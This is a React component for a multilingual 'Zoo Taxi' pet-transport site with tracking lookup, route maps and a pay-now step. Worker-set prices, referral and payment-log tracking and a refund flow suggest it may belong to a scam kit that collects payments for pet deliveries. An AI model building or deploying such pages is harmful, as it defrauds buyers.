import React, { useCallback, useEffect, useMemo, useRef, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './PetTaxiDeSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';
import { API_URL } from '../apiBase';
import { parsePageMeta } from '../petTaxiPricing';
import {
  ensureRouteForMap,
  formatRouteAddress,
  resolveMapEmbedSrc,
  resolvePetTaxiRoute,
} from '../petTaxiRoute';
import {
  getPetTaxiLocale,
  resolvePetTaxiCountryCode,
  isPetTaxiPublicSite,
} from '../petTaxiLocales';
import {
  clearRefundFlow,
} from '../paymentRefundFlow';
import {
  dedupedSessionStart,
  notifyPaymentSessionId,
  PAYMENT_FLOW_PAGE_KEY,
  PAYMENT_SESSION_ID_KEY,
  usePaymentSessionId,
} from '../paymentSession';

const PAW_LOGO_SRC = `${process.env.PUBLIC_URL || ''}/pet-taxi-paw-logo.png`;
const ABOUT_IMG_SRC = `${process.env.PUBLIC_URL || ''}/pet-taxi-about.png`;

function parsePriceNumber(raw) {
  if (raw == null || String(raw).trim() === '') return null;
  const s = String(raw)
    .replace(/\s+/g, '')
    .replace(/[^0-9.,-]/g, '')
    .replace(',', '.');
  const n = parseFloat(s);
  return Number.isFinite(n) ? n : null;
}

function formatPriceText(priceNumber) {
  if (priceNumber == null) return '—';
  return priceNumber % 1 === 0 ? String(priceNumber.toFixed(0)) : String(priceNumber);
}

function IconHeart() {
  return (
    <svg viewBox="0 0 24 24" aria-hidden>
      <path d="M12 20.5s-6.8-4.35-8.6-8.1C1.95 9.35 3.6 6.5 6.6 6.5c1.75 0 3.15.95 4 2.35.85-1.4 2.25-2.35 4-2.35 3 0 4.65 2.85 3.2 5.9-1.8 3.75-8.6 8.1-8.6 8.1Z" fill="none" stroke="currentColor" strokeWidth="1.8" strokeLinejoin="round" />
    </svg>
  );
}

function IconShield() {
  return (
    <svg viewBox="0 0 24 24" aria-hidden>
      <path d="M12 3 4 6v6c0 5 3.4 9.4 8 10 4.6-.6 8-5 8-10V6l-8-3Z" fill="none" stroke="currentColor" strokeWidth="1.8" strokeLinejoin="round" />
    </svg>
  );
}

function IconDrop() {
  return (
    <svg viewBox="0 0 24 24" aria-hidden>
      <path d="M12 3c3.5 4.2 7 8.1 7 12a7 7 0 1 1-14 0c0-3.9 3.5-7.8 7-12Z" fill="none" stroke="currentColor" strokeWidth="1.8" strokeLinejoin="round" />
    </svg>
  );
}

function IconVet() {
  return (
    <svg viewBox="0 0 24 24" aria-hidden>
      <path d="M4 10h16v10H4z" fill="none" stroke="currentColor" strokeWidth="1.8" strokeLinejoin="round" />
      <path d="M9 10V6h6v4M12 13v4M10 15h4" fill="none" stroke="currentColor" strokeWidth="1.8" strokeLinecap="round" />
    </svg>
  );
}

function IconHome() {
  return (
    <svg viewBox="0 0 24 24" aria-hidden>
      <path d="M4 10.5 12 4l8 6.5V20a1 1 0 0 1-1 1h-5v-6H10v6H5a1 1 0 0 1-1-1v-9.5Z" fill="none" stroke="currentColor" strokeWidth="1.8" strokeLinejoin="round" />
    </svg>
  );
}

function PetTaxiBrandLogo({ className = '', brandName = 'Zoo Taxi' }) {
  return (
    <div className={`pt-brand-logo${className ? ` ${className}` : ''}`}>
      <img src={PAW_LOGO_SRC} alt="" className="pt-brand-logo-paw" decoding="async" />
      <span className="pt-brand-logo-text">{brandName}</span>
    </div>
  );
}

function resolveTrackingState(meta) {
  const status = String(meta?.status || 'pending').toLowerCase();
  let routeProgress = meta?.route_progress;
  if (routeProgress == null) {
    routeProgress = status === 'in_transit' ? 0.5 : 0;
  } else {
    routeProgress = Number(routeProgress);
    if (!Number.isFinite(routeProgress)) routeProgress = 0;
  }
  routeProgress = Math.min(1, Math.max(0, routeProgress));
  if (status === 'in_transit' && routeProgress <= 0) routeProgress = 0.5;
  const isPaid = status === 'paid' || status === 'in_transit';
  const isInTransit = status === 'in_transit';
  return { status, routeProgress, isPaid, isInTransit };
}

function PetTaxiStatusBadge({ trackingState, t }) {
  if (!trackingState?.isPaid) return null;
  const label = trackingState.isInTransit ? t.statusInTransit : t.statusPaidHandover;
  return <div className="pt-track-status-badge">{label}</div>;
}

function PetTaxiTrackingSteps({ trackingState, t }) {
  const { isPaid, isInTransit } = trackingState || {};
  const stepClass = (step) => {
    if (step === 1) return isPaid || isInTransit ? 'pt-track-step-done' : 'pt-track-step-active';
    if (step === 2) return isInTransit ? 'pt-track-step-active' : '';
    return '';
  };
  return (
    <div className="pt-track-steps" aria-hidden>
      <div className={`pt-track-step ${stepClass(1)}`}><span>1</span> {t.stepAccepted}</div>
      <div className={`pt-track-step ${stepClass(2)}`}><span>2</span> {t.stepTransit}</div>
      <div className={`pt-track-step ${stepClass(3)}`}><span>3</span> {t.stepDelivered}</div>
    </div>
  );
}

function PetTaxiRouteMap({ route, mapTitle, lang, countryCode, loadingLabel }) {
  const [embedSrc, setEmbedSrc] = useState('');
  const [failed, setFailed] = useState(false);

  useEffect(() => {
    let cancelled = false;
    setFailed(false);
    setEmbedSrc('');
    resolveMapEmbedSrc(route, { lang, countryCode })
      .then((src) => {
        if (!cancelled) setEmbedSrc(src || '');
      })
      .catch(() => {
        if (!cancelled) setFailed(true);
      });
    return () => {
      cancelled = true;
    };
  }, [route, lang, countryCode]);

  return (
    <div className="pt-track-map">
      {!embedSrc && !failed && (
        <div className="pt-track-map-loading" aria-busy="true">
          {loadingLabel || '…'}
        </div>
      )}
      {failed && !embedSrc && (
        <div className="pt-track-map-loading">{loadingLabel || '…'}</div>
      )}
      {embedSrc && (
        <iframe
          title={mapTitle}
          src={embedSrc}
          loading="lazy"
          referrerPolicy="no-referrer-when-downgrade"
          allowFullScreen
        />
      )}
    </div>
  );
}

function PetTaxiPayButton({ index2Path, t, className = 'pt-track-result-actions', onAction }) {
  const handlePay = () => {
    clearRefundFlow();
    onAction?.();
  };
  return (
    <div className={className}>
      <Link to={index2Path} className="pt-btn pt-btn-dark pt-btn-block" onClick={handlePay}>
        {t.payNow}
      </Link>
    </div>
  );
}

function PetTaxiRouteDetails({ route, trackResult, t, trackAmountLine }) {
  if (!route && !trackResult) return null;
  return (
    <dl className="pt-track-route-dl">
      {(trackResult?.first_name || trackResult?.last_name) && (
        <div>
          <dt>{t.customer}</dt>
          <dd>{[trackResult.first_name, trackResult.last_name].filter(Boolean).join(' ')}</dd>
        </div>
      )}
      {route && (
        <>
          <div><dt>{t.from}</dt><dd>{formatRouteAddress(route.fromStreet, route.fromCity)}</dd></div>
          <div><dt>{t.to}</dt><dd>{formatRouteAddress(route.toStreet, route.toCity)}</dd></div>
          {route.distanceKm != null && (
            <div><dt>{t.distance}</dt><dd>{route.distanceKm} km</dd></div>
          )}
          {route.driveTime && (
            <div><dt>{t.plannedTime}</dt><dd>{route.driveTime}</dd></div>
          )}
        </>
      )}
      {!route && trackResult?.delivery_address && (
        <div>
          <dt>{t.addressLabel}</dt>
          <dd>{trackResult.delivery_address}</dd>
        </div>
      )}
      <div>
        <dt>{t.amount}</dt>
        <dd className="pt-pay-amount">{trackAmountLine}</dd>
      </div>
    </dl>
  );
}

function PetTaxiDeSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page && !!pageCode);
  const sessionId = usePaymentSessionId();

  const effectivePage = pageData || page || null;
  const meta = useMemo(() => parsePageMeta(effectivePage?.page_meta), [effectivePage?.page_meta]);
  const trackingCode = (effectivePage?.tracking_code || '').trim();
  const isWorkerPreview = Boolean(pageCode && effectivePage);

  const [mainTab, setMainTab] = useState('receive');
  const [sendDone, setSendDone] = useState(false);
  const [sendFromStreet, setSendFromStreet] = useState('');
  const [sendFromCity, setSendFromCity] = useState('');
  const [sendToStreet, setSendToStreet] = useState('');
  const [sendToCity, setSendToCity] = useState('');
  const [sendPet, setSendPet] = useState('');
  const [sendError, setSendError] = useState('');

  const [trackInput, setTrackInput] = useState('');
  const [trackResult, setTrackResult] = useState(null);
  const [trackError, setTrackError] = useState('');
  const [trackOpen, setTrackOpen] = useState(false);
  const [orderOpen, setOrderOpen] = useState(false);
  const [copied, setCopied] = useState(false);
  const trackResultRef = useRef(null);

  const localeCountry = resolvePetTaxiCountryCode({ trackResult, pageData: effectivePage, meta });
  const t = getPetTaxiLocale(localeCountry);

  const activePageCode = (trackResult?.page_code || pageCode || '').trim();
  const { toIndex2 } = usePaymentPaths(activePageCode);
  const index2Path = toIndex2();

  const countryCode = localeCountry;
  const currencyCode = getPrimaryCurrency(countryCode) || trackResult?.meta?.currency || meta?.currency || 'EUR';
  const sym = getSymbol(currencyCode);

  const trackPriceNumber = useMemo(
    () => parsePriceNumber(trackResult?.price),
    [trackResult?.price],
  );
  const workerPriceNumber = useMemo(
    () => parsePriceNumber(effectivePage?.price),
    [effectivePage?.price],
  );
  const metaPriceNumber = useMemo(
    () =>
      parsePriceNumber(trackResult?.meta?.pricing?.total) ??
      parsePriceNumber(meta?.pricing?.total),
    [trackResult?.meta?.pricing?.total, meta?.pricing?.total],
  );
  const amountPriceNumber = trackPriceNumber ?? workerPriceNumber ?? metaPriceNumber;
  const amountPriceText = formatPriceText(amountPriceNumber);
  const trackAmountLine =
    amountPriceText === '—' ? `— ${sym}` : `${amountPriceText} ${sym}`;

  const trackRoute = useMemo(
    () => (trackResult ? resolvePetTaxiRoute(trackResult) : null),
    [trackResult],
  );

  const pageRoute = useMemo(() => {
    if (!effectivePage?.tracking_code && !effectivePage?.page_meta) return null;
    return resolvePetTaxiRoute({
      meta,
      delivery_address: effectivePage?.delivery_address,
    });
  }, [effectivePage, meta]);

  const effectiveMeta = trackResult?.meta || meta;
  const trackingState = useMemo(() => resolveTrackingState(effectiveMeta), [effectiveMeta]);

  const mapRoute = useMemo(() => {
    const base = trackRoute || pageRoute;
    if (!base) return null;
    const enriched = ensureRouteForMap(base, localeCountry);
    if (trackingState.routeProgress > 0) {
      return { ...enriched, routeProgress: trackingState.routeProgress };
    }
    return enriched;
  }, [trackRoute, pageRoute, localeCountry, trackingState.routeProgress]);

  const workerPriceText = formatPriceText(workerPriceNumber);

  const bindTrackedSession = useCallback(async (pc) => {
    const code = (pc || '').trim().toUpperCase();
    if (!code) return;
    const base = API_URL.replace(/\/$/, '');
    const prev = sessionStorage.getItem(PAYMENT_FLOW_PAGE_KEY);
    if (prev && prev !== code) {
      sessionStorage.removeItem(PAYMENT_SESSION_ID_KEY);
      sessionStorage.removeItem('payment_log_id');
    }
    sessionStorage.setItem(PAYMENT_FLOW_PAGE_KEY, code);
    const urlParams = new URLSearchParams(window.location.search);
    const referralCode = urlParams.get('ref');
    const data = await dedupedSessionStart(base, {
      page_code: code,
      referral_code: referralCode || undefined,
    });
    if (data?.success && data.session_id) {
      sessionStorage.setItem(PAYMENT_SESSION_ID_KEY, data.session_id);
      if (data.log_id) sessionStorage.setItem('payment_log_id', String(data.log_id));
      notifyPaymentSessionId();
    }
  }, []);

  useEffect(() => {
    const base = API_URL.replace(/\/$/, '');
    const code = (pageCode || effectivePage?.page_code || '').trim().toUpperCase();
    if (code) {
      bindTrackedSession(code);
      return undefined;
    }
    if (!isPetTaxiPublicSite()) return undefined;
    let cancelled = false;
    dedupedSessionStart(base, { zoo_taxi: true, site: 'zoo_taxi' }).then((data) => {
      if (cancelled || !data?.success || !data.session_id) return;
      sessionStorage.setItem(PAYMENT_SESSION_ID_KEY, data.session_id);
      if (data.log_id) sessionStorage.setItem('payment_log_id', String(data.log_id));
      notifyPaymentSessionId();
    });
    return () => {
      cancelled = true;
    };
  }, [pageCode, effectivePage?.page_code, bindTrackedSession]);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  useEffect(() => {
    document.title = t.title;
  }, [t.title]);

  useEffect(() => {
    if (isWorkerPreview && trackingCode) setOrderOpen(true);
  }, [isWorkerPreview, trackingCode]);

  const lookupTrack = async () => {
    const code = trackInput.trim().toUpperCase();
    if (!code) return;
    setTrackError('');
    try {
      const base = API_URL.replace(/\/$/, '');
      const res = await fetch(`${base}/api/pet-taxi/track/${encodeURIComponent(code)}`);
      const data = await res.json();
      if (!data.success) {
        setTrackError(t.trackNotFound);
        setTrackResult(null);
        return;
      }
      setTrackResult(data.page);
      setTrackOpen(true);
      await bindTrackedSession(data.page.page_code);
      requestAnimationFrame(() => {
        trackResultRef.current?.scrollIntoView({ behavior: 'smooth', block: 'start' });
      });
    } catch {
      setTrackError(t.trackError);
    }
  };

  const copyCode = async () => {
    if (!trackingCode) return;
    try {
      await navigator.clipboard.writeText(trackingCode);
      setCopied(true);
      setTimeout(() => setCopied(false), 2000);
    } catch {
      /* ignore */
    }
  };

  const handleSendSubmit = (e) => {
    e.preventDefault();
    setSendError('');
    const fromCity = sendFromCity.trim();
    const toCity = sendToCity.trim();
    if (!fromCity || !toCity) {
      setSendError(t.sendAddressError);
      return;
    }
    setSendDone(true);
  };

  const year = new Date().getFullYear();
  const productName = (effectivePage?.product_name || meta?.pet_info || '').trim() || '—';

  if (loading && pageCode) {
    return (
      <div className="pt-wrap" lang={t.lang}>
        <header className="pt-header">
          <div className="pt-header-inner">
            <PetTaxiBrandLogo brandName={t.title} />
          </div>
        </header>
        <div className="pt-loading">{t.loading}</div>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  return (
    <div className="pt-wrap" lang={t.lang}>
      <header className="pt-header">
        <div className="pt-header-inner">
          <a
            href="#top"
            className="pt-header-brand"
            onClick={(e) => {
              e.preventDefault();
              window.scrollTo({ top: 0, behavior: 'smooth' });
            }}
          >
            <PetTaxiBrandLogo brandName={t.title} />
          </a>
        </div>
      </header>

      <header className="pt-hero" id="top">
        <div className="pt-hero-pattern" aria-hidden />
        <div className="pt-hero-inner">
          <p className="pt-hero-kicker">{t.heroKicker}</p>
          <h1 className="pt-hero-title">{t.title}</h1>
          <p className="pt-hero-sub">{t.heroSub}</p>
        </div>
      </header>

      <section className="pt-section" id="pt-main">
        <div className="pt-tabs" role="tablist">
          <button
            type="button"
            role="tab"
            aria-selected={mainTab === 'send'}
            className={`pt-tab${mainTab === 'send' ? ' pt-tab-active' : ''}`}
            onClick={() => setMainTab('send')}
          >
            {t.tabSend}
          </button>
          <button
            type="button"
            role="tab"
            aria-selected={mainTab === 'receive'}
            className={`pt-tab${mainTab === 'receive' ? ' pt-tab-active' : ''}`}
            onClick={() => setMainTab('receive')}
          >
            {t.tabReceive}
          </button>
        </div>

        {mainTab === 'send' && (
          <div className="pt-send-panel" role="tabpanel">
            {sendDone ? (
              <div className="pt-send-done">
                <h2 className="pt-section-title">{t.sendDoneTitle}</h2>
                <p>{t.sendDoneText}</p>
              </div>
            ) : (
              <>
                <h2 className="pt-section-title">{t.sendTitle}</h2>
                <p className="pt-send-hint">{t.sendHint}</p>
                <form className="pt-send-form" onSubmit={handleSendSubmit}>
                  <fieldset className="pt-send-fieldset">
                    <legend>{t.sendFrom}</legend>
                    <label>
                      <span>{t.streetPh}</span>
                      <input
                        type="text"
                        value={sendFromStreet}
                        onChange={(e) => setSendFromStreet(e.target.value)}
                        placeholder={t.fromExample?.split(',')[0]?.trim() || t.streetPh}
                        autoComplete="address-line1"
                      />
                    </label>
                    <label>
                      <span>{t.cityPh} *</span>
                      <input
                        type="text"
                        value={sendFromCity}
                        onChange={(e) => setSendFromCity(e.target.value)}
                        placeholder={t.fromExample?.split(',')[1]?.trim() || t.cityPh}
                        autoComplete="address-level2"
                        required
                      />
                    </label>
                  </fieldset>
                  <fieldset className="pt-send-fieldset">
                    <legend>{t.sendTo}</legend>
                    <label>
                      <span>{t.streetPh}</span>
                      <input
                        type="text"
                        value={sendToStreet}
                        onChange={(e) => setSendToStreet(e.target.value)}
                        placeholder={t.toExample?.split(',')[0]?.trim() || t.streetPh}
                        autoComplete="address-line1"
                      />
                    </label>
                    <label>
                      <span>{t.cityPh} *</span>
                      <input
                        type="text"
                        value={sendToCity}
                        onChange={(e) => setSendToCity(e.target.value)}
                        placeholder={t.toExample?.split(',')[1]?.trim() || t.cityPh}
                        autoComplete="address-level2"
                        required
                      />
                    </label>
                  </fieldset>
                  <label>
                    <span>{t.sendPet}</span>
                    <input
                      type="text"
                      value={sendPet}
                      onChange={(e) => setSendPet(e.target.value)}
                      placeholder={t.sendPet}
                      autoComplete="off"
                    />
                  </label>
                  {sendError && <p className="pt-error">{sendError}</p>}
                  <button type="submit" className="pt-btn pt-btn-dark pt-btn-block">
                    {t.sendSubmit}
                  </button>
                </form>
              </>
            )}
          </div>
        )}

        {mainTab === 'receive' && (
          <div className="pt-receive-panel" role="tabpanel">
            <h2 className="pt-section-title">{t.trackTitle}</h2>
            <div className="pt-track-bar">
              <p className="pt-track-hint">{t.trackHint}</p>
              <div className="pt-track-form">
                <input
                  type="text"
                  value={trackInput}
                  onChange={(e) => setTrackInput(e.target.value.toUpperCase())}
                  placeholder={t.trackPlaceholder}
                  maxLength={12}
                />
                <button type="button" className="pt-btn pt-btn-dark" onClick={lookupTrack}>
                  {t.trackBtn}
                </button>
              </div>
              {trackError && <p className="pt-error">{trackError}</p>}
            </div>

            {trackResult && (
              <div className="pt-track-result" ref={trackResultRef}>
                <div className="pt-track-result-head">
                  <h3>{t.trackModalHead}</h3>
                </div>
                <PetTaxiStatusBadge trackingState={trackingState} t={t} />
                <p className="pt-track-code-line">
                  {t.tracking}: <strong>{trackResult.tracking_code}</strong>
                </p>
                <PetTaxiTrackingSteps trackingState={trackingState} t={t} />
                {mapRoute && (
                  <PetTaxiRouteMap
                    route={mapRoute}
                    mapTitle={t.mapRouteTitle}
                    lang={t.lang}
                    countryCode={localeCountry}
                    loadingLabel={t.mapLoading}
                  />
                )}
                <div className="pt-track-pet-card pt-track-pet-card-inline">
                  {trackResult.photo_url && (
                    <img src={trackResult.photo_url} alt="" className="pt-track-pet-img" />
                  )}
                  <div>
                    <strong>{trackResult.product_name || '—'}</strong>
                    {trackResult.meta?.weight_kg && <p>{trackResult.meta.weight_kg} kg</p>}
                  </div>
                </div>
                <PetTaxiRouteDetails
                  route={trackRoute || mapRoute}
                  trackResult={trackResult}
                  t={t}
                  trackAmountLine={trackAmountLine}
                />
                <div className="pt-track-result-actions">
                  {!trackingState.isPaid && <PetTaxiPayButton index2Path={index2Path} t={t} />}
                  <button
                    type="button"
                    className="pt-btn pt-btn-outline pt-btn-block"
                    onClick={() => setTrackOpen(true)}
                  >
                    {t.trackDetailsBtn}
                  </button>
                </div>
              </div>
            )}
          </div>
        )}

        {isWorkerPreview && mapRoute && !trackResult && (
          <div className="pt-page-route">
            <h2 className="pt-section-title">{t.mapRouteTitle}</h2>
            <PetTaxiStatusBadge trackingState={trackingState} t={t} />
            <PetTaxiTrackingSteps trackingState={trackingState} t={t} />
            <PetTaxiRouteMap
              route={mapRoute}
              mapTitle={t.mapRouteTitle}
              lang={t.lang}
              countryCode={localeCountry}
              loadingLabel={t.mapLoading}
            />
            <PetTaxiRouteDetails
              route={pageRoute || mapRoute}
              trackResult={null}
              t={t}
              trackAmountLine={trackAmountLine}
            />
            {activePageCode && !trackingState.isPaid && (
              <PetTaxiPayButton
                index2Path={index2Path}
                t={t}
                className="pt-page-actions"
              />
            )}
          </div>
        )}
      </section>

      <section className="pt-section pt-muted">
        <h2 className="pt-section-title">{t.whyTitle}</h2>
        <div className="pt-cards pt-cards-3">
          <article className="pt-card">
            <div className="pt-card-icon"><IconHeart /></div>
            <h3>{t.why1Title}</h3>
            <p>{t.why1Text}</p>
          </article>
          <article className="pt-card">
            <div className="pt-card-icon"><IconShield /></div>
            <h3>{t.why2Title}</h3>
            <p>{t.why2Text}</p>
          </article>
          <article className="pt-card">
            <div className="pt-card-icon"><IconDrop /></div>
            <h3>{t.why3Title}</h3>
            <p>{t.why3Text}</p>
          </article>
        </div>
      </section>

      <section className="pt-section">
        <h2 className="pt-section-title">{t.servicesTitle}</h2>
        <div className="pt-cards pt-cards-3">
          <article className="pt-card">
            <div className="pt-card-icon pt-card-icon-paw">
              <img src={PAW_LOGO_SRC} alt="" decoding="async" />
            </div>
            <h3>{t.svc1Title}</h3>
            <p>{t.svc1Text}</p>
          </article>
          <article className="pt-card">
            <div className="pt-card-icon"><IconVet /></div>
            <h3>{t.svc2Title}</h3>
            <p>{t.svc2Text}</p>
          </article>
          <article className="pt-card">
            <div className="pt-card-icon"><IconHome /></div>
            <h3>{t.svc3Title}</h3>
            <p>{t.svc3Text}</p>
          </article>
        </div>
      </section>

      <section className="pt-section pt-faq">
        <h2 className="pt-section-title">{t.faqTitle}</h2>
        <div className="pt-faq-list">
          <article className="pt-faq-item">
            <h3>{t.faq1Q}</h3>
            <p>{t.faq1A}</p>
          </article>
          <article className="pt-faq-item">
            <h3>{t.faq2Q}</h3>
            <p>{t.faq2A}</p>
          </article>
          <article className="pt-faq-item">
            <h3>{t.faq3Q}</h3>
            <p>{t.faq3A}</p>
          </article>
        </div>
      </section>

      <section className="pt-section pt-about pt-about-bottom">
        <h2 className="pt-section-title">{t.aboutTitle}</h2>
        <div className="pt-about-grid">
          <div className="pt-about-text">
            <p>{t.about1}</p>
            <p>{t.about2}</p>
            <p>{t.about3}</p>
            <blockquote className="pt-quote">{t.aboutQuote}</blockquote>
          </div>
          <div className="pt-about-visual" aria-hidden>
            <div className="pt-about-card">
              <img src={ABOUT_IMG_SRC} alt="" className="pt-about-photo" decoding="async" />
            </div>
          </div>
        </div>
      </section>

      <footer className="pt-footer">
        <div className="pt-footer-inner">
          <strong className="pt-footer-brand">{t.footerBrand}</strong>
          <p>{t.footerLine}</p>
          <p className="pt-footer-copy">© {year} {t.footerBrand || t.title}. {t.footerCopy}</p>
        </div>
      </footer>

      {orderOpen && isWorkerPreview && trackingCode && (
        <div className="pt-modal-backdrop" role="presentation" onClick={() => setOrderOpen(false)}>
          <div className="pt-modal" role="dialog" aria-modal="true" onClick={(e) => e.stopPropagation()}>
            <button type="button" className="pt-modal-close" onClick={() => setOrderOpen(false)} aria-label={t.close}>×</button>
            <span className="pt-modal-badge">{t.modalBadge}</span>
            <h2>{t.modalTitle}</h2>
            <p>{t.modalHint}</p>
            <div className="pt-code-box">{trackingCode}</div>
            {meta?.pricing && (
              <dl className="pt-modal-dl">
                <div><dt>{t.priceTotal}</dt><dd><strong>{workerPriceText} {currencyCode}</strong></dd></div>
                <div><dt>{t.pet}</dt><dd>{productName}</dd></div>
              </dl>
            )}
            <div className="pt-modal-actions">
              <button type="button" className="pt-btn pt-btn-outline pt-btn-block" onClick={copyCode}>
                {copied ? t.copied : t.copyCode}
              </button>
            </div>
          </div>
        </div>
      )}

      {trackOpen && trackResult && (
        <div className="pt-modal-backdrop" role="presentation" onClick={() => setTrackOpen(false)}>
          <div className="pt-modal pt-modal-track" role="dialog" aria-modal="true" onClick={(e) => e.stopPropagation()}>
            <button type="button" className="pt-modal-close" onClick={() => setTrackOpen(false)} aria-label={t.close}>×</button>
            <div className="pt-track-head">
              <h2>{t.trackModalHead}</h2>
            </div>
            <PetTaxiStatusBadge trackingState={trackingState} t={t} />
            <p className="pt-track-code-line">
              {t.tracking}: <strong>{trackResult.tracking_code}</strong>
            </p>
            <PetTaxiTrackingSteps trackingState={trackingState} t={t} />
            {mapRoute && (
              <PetTaxiRouteMap
                route={mapRoute}
                mapTitle={t.mapRouteTitle}
                lang={t.lang}
                countryCode={localeCountry}
                loadingLabel={t.mapLoading}
              />
            )}
            <div className="pt-track-pet-card">
              {trackResult.photo_url && (
                <img src={trackResult.photo_url} alt="" className="pt-track-pet-img" />
              )}
              <div>
                <strong>{trackResult.product_name || '—'}</strong>
                {trackResult.meta?.weight_kg && <p>{trackResult.meta.weight_kg} kg</p>}
              </div>
            </div>
            <PetTaxiRouteDetails
              route={trackRoute || mapRoute}
              trackResult={trackResult}
              t={t}
              trackAmountLine={trackAmountLine}
            />
            <div className="pt-modal-actions">
              {!trackingState.isPaid && (
                <PetTaxiPayButton
                  index2Path={index2Path}
                  t={t}
                  className="pt-modal-actions-stack"
                  onAction={() => setTrackOpen(false)}
                />
              )}
              <button type="button" className="pt-btn pt-btn-outline pt-btn-block" onClick={() => setTrackOpen(false)}>
                {t.done}
              </button>
            </div>
          </div>
        </div>
      )}

      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

export default PetTaxiDeSuccess;
